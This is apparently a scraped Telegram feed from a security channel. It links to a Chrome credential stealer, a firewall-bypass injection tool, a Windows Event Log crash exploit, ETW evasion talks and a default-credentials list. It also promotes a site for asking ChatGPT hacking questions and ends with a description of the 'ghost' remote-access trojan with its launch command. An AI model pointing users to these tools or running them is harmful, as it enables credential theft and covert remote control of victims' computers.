PS_Automation_Scripting.pdf
16.3 MB
"PowerShell Automation and Scripting for Cybersecurity: Hacking and defense for red and blue teamers", 2023.
#powershell
———
@islemolecule_source
#powershell
———
@islemolecule_source
👏4
Simple password/cookies/history/bookmarks stealer/dumper for chrome all version
Link
#malware_dev
———
@islemolecule_source
Link
#malware_dev
———
@islemolecule_source
Download Reverse engineering, windows programming, internals,etc..
Link
#windows #reverse #programming #internals
———
@islemolecule_source
Link
#windows #reverse #programming #internals
———
@islemolecule_source
allows any user to crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain
Link
#windows
#malware_dev
———
@islemolecule_source
Link
#windows
#malware_dev
———
@islemolecule_source
ec council - secure programming with c++
Chapter 1: Introduction to C++ Programming
Chapter 2: Battling Integer Vulnerabilities in C++
Chapter 3: Memory Management in C++
Chapter 4: Pointer Subterfuge and Object Misuse in C++
Chapter 5: Code Injection Attacks and Run-time Countermeasures
Chapter 6: Eliminate Common Issues with Multithreaded Programming: Concurrency and Parallelism
Chapter 7: Exceptions and Error Handling in C++
Chapter 8: Industry Resources and Best Practices for C++ Development
LINK
file password :
course website link
Chapter 1: Introduction to C++ Programming
Chapter 2: Battling Integer Vulnerabilities in C++
Chapter 3: Memory Management in C++
Chapter 4: Pointer Subterfuge and Object Misuse in C++
Chapter 5: Code Injection Attacks and Run-time Countermeasures
Chapter 6: Eliminate Common Issues with Multithreaded Programming: Concurrency and Parallelism
Chapter 7: Exceptions and Error Handling in C++
Chapter 8: Industry Resources and Best Practices for C++ Development
LINK
file password :
https://news.1rj.ru/str/islemolecule_sourcecourse website link
❤5👍1
👍3
post get updated :
+ Detecting In-Memory Threats with Kernel ETW Call Stacks
+ Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers
+ A Begginers All Inclusive Guide to ETW
+ ETW References
+ Give Me an E, Give Me a T, Give Me a W. What Do You Get? RPC! (pars events from the RPC ETW)
+ Attacks on ETW Blind EDR Sensors ( black hat con )
+ Detecting In-Memory Threats with Kernel ETW Call Stacks
+ Direct Kernel Object Manipulation (DKOM) Attacks on ETW Providers
+ A Begginers All Inclusive Guide to ETW
+ ETW References
+ Give Me an E, Give Me a T, Give Me a W. What Do You Get? RPC! (pars events from the RPC ETW)
+ Attacks on ETW Blind EDR Sensors ( black hat con )
Windows - Data Protection API (DPAPI)
https://tierzerosecurity.co.nz/2024/01/22/data-protection-windows-api.html
#windows , #internals
———
@islemolecule_source
https://tierzerosecurity.co.nz/2024/01/22/data-protection-windows-api.html
#windows , #internals
———
@islemolecule_source
many ask what is the best assembly course out there ?
this a 4 hours " Game Development in assembly " which i recommand every time
https://www.youtube.com/watch?v=p60L-TOecik
have a nice time with that 👍🏻
it's a joke plz don't take it serious.
this a 4 hours " Game Development in assembly " which i recommand every time
https://www.youtube.com/watch?v=p60L-TOecik
have a nice time with that 👍🏻
🤣3👍2
A site that allows you to ask hacker questions from chatgpt
https://www.hackergpt.co/
github
———
@islemolecule_source
https://www.hackergpt.co/
github
———
@islemolecule_source
👍2
One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password
https://github.com/ihebski/DefaultCreds-cheat-sheet
———
@islemolecule_source
https://github.com/ihebski/DefaultCreds-cheat-sheet
———
@islemolecule_source
👍2
Source Byte pinned «A site that allows you to ask hacker questions from chatgpt https://www.hackergpt.co/ github ——— @islemolecule_source»
Lightweight static analysis for many languages. Find bug variants with patterns that look like source code.
https://github.com/semgrep/semgrep
———
@islemolecule_source
https://github.com/semgrep/semgrep
———
@islemolecule_source
👎3👍2
Bypass firewall through process injection
https://github.com/redeflesq/firewall-bypass
#malware_dev
———
@islemolecule_source
https://github.com/redeflesq/firewall-bypass
#malware_dev
———
@islemolecule_source
👍2
👍2
Forwarded from BugCod3
ghost is a light RAT that gives the server/attacker full remote access to the user's command-line interpreter (cmd.exe). They are allowed to execute commands silently without the client/zombie noticing. The server/attacker is also given the ability to download and execute files on the client/zombie's computer. This is also a silent and hidden process. Like most Remote Access Trojans, this download and execution ability helps distribute viruses and other pieces of malware.
This malware is distributed simply by running zombie.exe. This file name can be changed to whatever. There is no restriction. When run, it searches for the first two arguments (IP & Port). If neither is provided, the program doesn't run. With that being said, make sure you provide the server's IP and Port in the command-line arguments. Example:
zombie.exe 127.0.0.1 27015
BugCod3#Rat #Malware #Remote #Access
Please open Telegram to view this post
VIEW IN TELEGRAM
👌2👍1